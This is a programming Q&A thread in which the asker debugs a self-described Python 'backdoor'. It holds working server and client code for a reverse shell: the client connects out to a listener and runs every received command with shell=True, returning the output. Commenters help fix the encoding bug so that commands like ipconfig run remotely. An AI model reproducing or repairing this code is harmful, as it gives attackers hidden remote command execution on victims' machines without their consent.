# Subprocess IndexError: Ipconfig broken but dir working?

Tags: python, python-3.x, sockets, subprocess, index-error

Trying to run a backdoor with subprocess module. Having Index Error when I run ipconfig command, but dir command working well, details below, any ideas?

Server

```
import socket

class Server:
    def __init__(self, host, port):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.bind((host, port))
        sock.listen(0)
        (self.connection, self.address) = sock.accept()
        print(f"New connection from --> {self.address[0]}")

    def command_execution(self, command_input):
        self.connection.send(command_input)
        return self.connection.recv(2048).decode()


    def start(self):
        while True:
            command_input = input(">> ")
            data = self.command_execution(command_input.encode())
            print(data)

listener_one = Server("192.168.1.46", 8080)
listener_one.start()
```

Client

```
import socket
import subprocess


class Client:
    def __init__(self, host, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((host, port))

    def command_execution(self, command):
        return subprocess.check_output(command, shell=True)

    def start(self):
        while True:
            command = self.connection.recv(2048)
            command_output = self.command_execution(command.decode())
            self.connection.send(command_output.encode())


client_one = Client("192.168.1.46", 8080)
client_one.start()
```

```
Input on client --> python3 my_server.py
New connection from --> 192.168.1.38
>> ipconfig
```

Output on server -->

```
Exception in thread Thread-1:
Traceback (most recent call last):
  File "C:\Users\burak\AppData\Local\Programs\Python\Python38\lib\threading.py", line 932, in _bootstrap_inner
    self.run()
  File "C:\Users\burak\AppData\Local\Programs\Python\Python38\lib\threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "C:\Users\burak\AppData\Local\Programs\Python\Python38\lib\subprocess.py", line 1366, in _readerthread
    buffer.append(fh.read())
  File "C:\Users\burak\AppData\Local\Programs\Python\Python38\lib\encodings\cp1254.py", line 23, in decode
    return codecs.charmap_decode(input,self.errors,decoding_table)[0]
UnicodeDecodeError: 'charmap' codec can't decode byte 0x8d in position 69: character maps to <undefined>
Traceback (most recent call last):
  File "C:/Users/burak/Desktop/Folders/FILES/scripts/scripts_1/my_client.py", line 21, in <module>
    client_one.start()
  File "C:/Users/burak/Desktop/Folders/FILES/scripts/scripts_1/my_client.py", line 16, in start
    command_output = self.command_execution(command.decode())
  File "C:/Users/burak/Desktop/Folders/FILES/scripts/scripts_1/my_client.py", line 11, in command_execution
    return subprocess.check_output(command, shell=True)
  File "C:\Users\burak\AppData\Local\Programs\Python\Python38\lib\subprocess.py", line 411, in check_output
    return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
  File "C:\Users\burak\AppData\Local\Programs\Python\Python38\lib\site-packages\run\__init__.py", line 168, in stdout
    return std_output(self.process.communicate()[0])
  File "C:\Users\burak\AppData\Local\Programs\Python\Python38\lib\subprocess.py", line 1024, in communicate
    stdout, stderr = self._communicate(input, endtime, timeout)
  File "C:\Users\burak\AppData\Local\Programs\Python\Python38\lib\subprocess.py", line 1416, in _communicate
    stdout = stdout[0]
IndexError: list index out of range

Process finished with exit code 1
```

Comment: I don't know why `dir` would work, but `check_output` is expecting a list/tuple.  I'd try wrapping the command in a list.

Comment: how ? when I attach it to a variable and try to call a[0] it is not working as pairs

Comment: If I try `import subprocess` and then `subprocess.check_output("dir",shell=True)` and `subprocess.check_output("ipconfig",shell=True)`, both of them work. Also, the message complains about a 0x8d character, so it probably has more to do with those encode/decode calls.

Comment: ipconfig not working for me, which python version u using ?

Comment: In particular it was 3.7.3 bundled in Anaconda. For me, the code dies with `AttributeError: 'bytes' object has no attribute 'encode'`, so I went with `self.connection.send(command_output)` in the client, then server died with decoding a 0xff character which appeared at non-breaking space positions, so went with `return self.connection.recv(2048)` in the server, then both `dir` and `ipconfig` work, though the printed raw bytes object is not too beautiful.

Comment: A `python -c "import subprocess;print(subprocess.check_output('ipconfig',shell=True))"` fails on your machine?